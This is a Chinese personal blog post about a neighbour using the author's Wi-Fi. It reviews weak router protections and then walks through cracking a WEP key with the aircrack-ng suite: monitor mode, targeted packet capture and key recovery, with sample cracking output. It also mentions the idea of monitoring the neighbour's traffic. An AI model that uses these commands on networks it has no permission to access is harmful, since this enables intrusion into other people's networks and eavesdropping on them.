• 好久没有破解别人的无线了, 重温一下


    几年前, 没有网络上的时候, 曾经专门买了一本 就是为了上别人的高速网络。

    今天自个的网络被别人蹭了, 其实我我也挺体会他们的情况的, 只要不影响我上网就算了, 过年期间, 我回家了, 都打开着路由器 让别人去蹭,

    最近我有点想这道这位高人用什么软件破解我的无线密码, 难道高手在人间

    于是试着换密码, 很快就被破解了

    我多换了几次, 可能是惹到高手了

    他直接ap桥接走了 (有点不思其解), 没有办法, 重新从抽屉中换一个路由器, (baffulo 小日本的品牌)有更多的选项玩

    我还是前面的话, 准备给他用, 白天我上班爱怎么用就怎么用,

    突然想监控他的行为, 譬如上什么网站, 使用什么社交软件, 什么时候上网的流量多, 这么一想, 就往安全里陷入了

    1, 我是否也被他反监控

    2, 我平时使用的帐号啊 加密的,没有加密的

    3, 我自己的行为

    ...

    回忆了一下无线路由器的安全设置, 无外乎

    1 更新系统

    2 隐藏essid (可以破解)

    3 加密方式 (只要收集足够的包加上时间就可以破解)

    4 mac过滤 (可以绕过)

    5 wps (wps中旧版本也有漏洞供破解)

    6 周期更新密码

    越想越不靠谱

    ...

    还是自己一起玩玩 ... 鹿死谁手 ?

    先从 wep 破解开始吧

    很简单

    无线网卡切换到monitor 模式

    airmon-ng start (interface)

    找目标

    airodump-ng (interface)

    收集报文

    sudo airodump-ng -c (channel) -w (out-file) --bssid (bssid) (interface)

    破解

    udo aircrack-ng -b (bssid) (out-file).cap

    结果

                     [00:00:03] Tested 181950 keys (got 11743 IVs)

       KB    depth   byte(vote)
        0   12/ 14   92(14592) 12(14336) 2A(14336) 2D(14336) 40(14336)
        1    5/ 23   34(15360) 02(15360) DD(15104) FA(15104) 6D(15104)
        2    6/ 23   56(15360) AA(15360) 22(15104) 5D(15104) 9F(15104)
        3    0/ 26   78(15872) B0(15360) CD(15104) BE(14848) DA(14848)
        4    0/  1   90(19712) EF(16384) 3C(15872) CE(15616) A3(15360)

                             KEY FOUND! [ 12:34:56:78:90 ]
        Decrypted correctly: 100%
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 49873 ivs.
                             KEY FOUND! [ 75:98:37:89:39 ]
        Decrypted correctly: 100%


    不过wep 破解没有现实意义, 不过练手是可以的。

  • 相关阅读:
    win10开机自启脚本
    centos7安装redis
    oracle安装
    Python进程和线程实例详解
    sonar+postgresql
    centos7更换下载源
    Python强大的日志模块logging
    centos7切换图形界面
    centos7安装mysql5.7
    Python正则表达式大全
  • 原文地址:https://www.cnblogs.com/kwingmei/p/3589501.html
Copyright © 2020-2023  润新知